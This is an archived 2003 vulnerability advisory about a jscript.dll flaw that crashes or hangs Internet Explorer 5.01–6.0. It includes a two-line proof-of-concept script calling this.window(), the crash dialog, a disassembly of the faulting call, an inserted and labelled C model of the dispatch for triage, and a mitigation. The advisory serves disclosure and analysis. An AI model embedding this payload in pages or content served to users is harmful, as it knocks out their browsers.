jscriptdll.txt

Posted May 13, 2003
Authored by Gregory R. Panakkal | Site evilcreations.net

Microsoft's Windows Script Engine has a flaw in its JScript implementation, jscript.dll. When Internet Explorer loads a web page whose script calls self.window() (or this.window()), the browser crashes with an access violation or hangs. The demonstrated impact is a client-side denial of service. Tested against IE versions: 5.01 (Win2000), 5.5 (Win98SE), 6.0 (WinXP). Vulnerable jscript.dll versions: 5.1.0.8513 (Win2000), 5.5.0.8513 (Win98SE), 5.6.0.6626 (WinXP Pro), 5.6.0.8513 (Win2000).

tags | exploit, web
systems | windows
SHA-256 | 47ac1d606f466452571ac90777b13a37b24d69838cf1609016f6c7dfe9905845

Hi,

I found a bug in jscript.dll. Here is a small report on it.

--------
Abstract
--------

Microsoft Corp.'s Windows Script Engine within the Windows operating
system (OS) interprets and executes script code written in scripting
languages such as VBScript and JScript (Microsoft's implementation of
JavaScript). Such script code can be used to add functionality to web
pages, or to automate tasks within the OS or a program.

-----------
Description
-----------
By delivering malicious JavaScript through Internet Explorer (IE), Outlook or
Outlook Express, a remote attacker can crash Internet Explorer. The impact
demonstrated here is a denial of service (crash or hang) of the browser; this
report does not demonstrate code execution.
The bug lies in the Windows Script Engine's implementation of JScript, which
is provided by jscript.dll (located in %SystemRoot%\system32).
Either of the following snippets of JavaScript demonstrates the bug by
crashing IE on a vulnerable Windows system:

----------
Exploit
----------

<script>
this.window();
</script>

or....

<script>
self.window();
</script>

---------
Notes
---------

On Win2k, IE crashes with the following error:
----------------------------------------------------
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
The memory could not be "read".
----------------------------------------------------

Disassembly of JScript.dll [5.6.0.8513] around the faulting instruction:
6B73AA0A je 6B73AA25
6B73AA0C mov eax,dword ptr [ebp-64h]
6B73AA0F mov eax,dword ptr [eax+8]
6B73AA12 mov ecx,dword ptr [eax]
6B73AA14 push eax
6B73AA15 call dword ptr [ecx+8] <--- illegal op
6B73AA18 mov edx,dword ptr [ebp-4Ch]
6B73AA1B push edx
6B73AA1C call dword ptr ds:[6B773218h]
6B73AA22 add esp,4
6B73AA25 mov eax,dword ptr [ebp-34h]
6B73AA28 jmp 6B7213CB
6B73AA2D mov esi,dword ptr [ebp+18h]


We find that the value in ecx (i.e. the value at the memory location
pointed to by eax) is corrupted.
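
Added example (not part of the advisory): a C model of the dispatch sequence at
6B73AA0C..6B73AA15 together with two triage helpers. The structure and field
names (Holder, Obj, VTbl) are invented for illustration; only the offsets
(+8 into the holder, +0 for the table pointer, +8 into the table) come from the
listing above. On 32-bit x86, slot +8 of a COM vtable is IUnknown::Release, so
if the object is a COM interface pointer the crash is a Release() call through
an overwritten vtable pointer; the advisory does not establish that the object
is COM, so treat that reading as an assumption. register_from_fault() recovers
ecx from the address in the error dialog (the faulting read is of [ecx+8], so
ecx = 0x006f0063 - 8 = 0x006f005b), and dword_as_utf16le() shows that the bogus
value decodes as the UTF-16LE code units 'c','o', which is worth recording in
triage but is not a root-cause finding.

```c
#include <stdint.h>
#include <stdio.h>

/* Model of the code at 6B73AA0C..6B73AA15 (32-bit):
 *   mov eax,[ebp-64h]   ; eax = Holder*
 *   mov eax,[eax+8]     ; eax = Holder->obj
 *   mov ecx,[eax]       ; ecx = obj->vtbl
 *   call [ecx+8]        ; third slot of the table
 * Names below are assumptions made for this example, not from the advisory. */

typedef struct Obj Obj;

/* Three-slot table laid out like a 32-bit COM IUnknown vtable:
 * +0 QueryInterface, +4 AddRef, +8 Release. Only the +8 offset is taken
 * from the listing; the COM interpretation is an assumption. */
typedef struct {
    uint32_t (*slot0)(Obj *);
    uint32_t (*slot1)(Obj *);
    uint32_t (*slot2)(Obj *);   /* what call [ecx+8] reaches */
} VTbl;

struct Obj {
    const VTbl *vtbl;           /* ecx = [eax] */
};

typedef struct {
    uint32_t pad[2];
    Obj *obj;                   /* eax = [eax+8] */
} Holder;                       /* [ebp-64h] points at one of these */

static uint32_t release_ok(Obj *self) { (void)self; return 0xC0DE; }
static uint32_t unused(Obj *self)     { (void)self; return 0; }
static const VTbl good_vtbl = { unused, unused, release_ok };

/* The faulting sequence. It is only safe when h->obj->vtbl points at a
 * real table; with a corrupted vtbl the read of vt->slot2 is the access
 * violation reported in the advisory. */
static uint32_t dispatch(Holder *h)
{
    Obj *obj = h->obj;          /* mov eax,[eax+8] */
    const VTbl *vt = obj->vtbl; /* mov ecx,[eax]   */
    return vt->slot2(obj);      /* call [ecx+8]    */
}

/* Triage helper: the dialog reports the address that could not be read.
 * For "call dword ptr [ecx+disp]" that address is ecx+disp, so the register
 * value at the time of the fault is fault_addr - disp. */
static uint32_t register_from_fault(uint32_t fault_addr, uint32_t disp)
{
    return fault_addr - disp;
}

/* Triage helper: view a dword as two little-endian UTF-16 code units.
 * 0x006f0063 -> U+0063 'c', U+006F 'o'. A pointer that decodes to printable
 * text is a hint worth noting; this example draws no conclusion from it. */
static void dword_as_utf16le(uint32_t v, uint16_t out[2])
{
    out[0] = (uint16_t)(v & 0xFFFFu);
    out[1] = (uint16_t)(v >> 16);
}

int main(void)
{
    Obj good = { &good_vtbl };
    Holder h = { {0, 0}, &good };
    uint16_t cu[2];

    printf("dispatch through a valid table returns 0x%X\n", dispatch(&h));
    printf("ecx at the fault: 0x%08X\n", register_from_fault(0x006f0063u, 8));
    dword_as_utf16le(0x006f0063u, cu);
    printf("fault address as UTF-16LE: U+%04X U+%04X\n", cu[0], cu[1]);
    return 0;
}
```

The model deliberately does not dereference a bad pointer: the point is the shape of the dispatch and how to read the dialog's address back into a register value, not to reproduce the crash outside IE.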


Please note:
a few times IE did not raise an exception; instead it went into a sort of hung state,
where the Home/Stop buttons and any new URL typed in the address bar did not work.

---------------------------
Possible Solution
---------------------------
Disable Active Scripting (in IE: Tools > Internet Options > Security, per zone).


---------------
Tested On
---------------
IE 5.01 (Win2000)
IE 5.5 (Win98SE)
IE 6.0 (WinXP)

i.e.
JScript.dll versions:
5.1.0.8513 (Win2000)
5.5.0.8513 (Win98SE)
5.6.0.6626 (WinXP Pro)
5.6.0.8513 (Win2000)


----------
Credits
----------
Real Name : Gregory R. Panakkal
Handle : junkcode
E-Mail : junkcode@gmx.net
WWW : www.evilcreations.net/junkcode/ (OR) www.crapware.tk

rgds,
junkcode
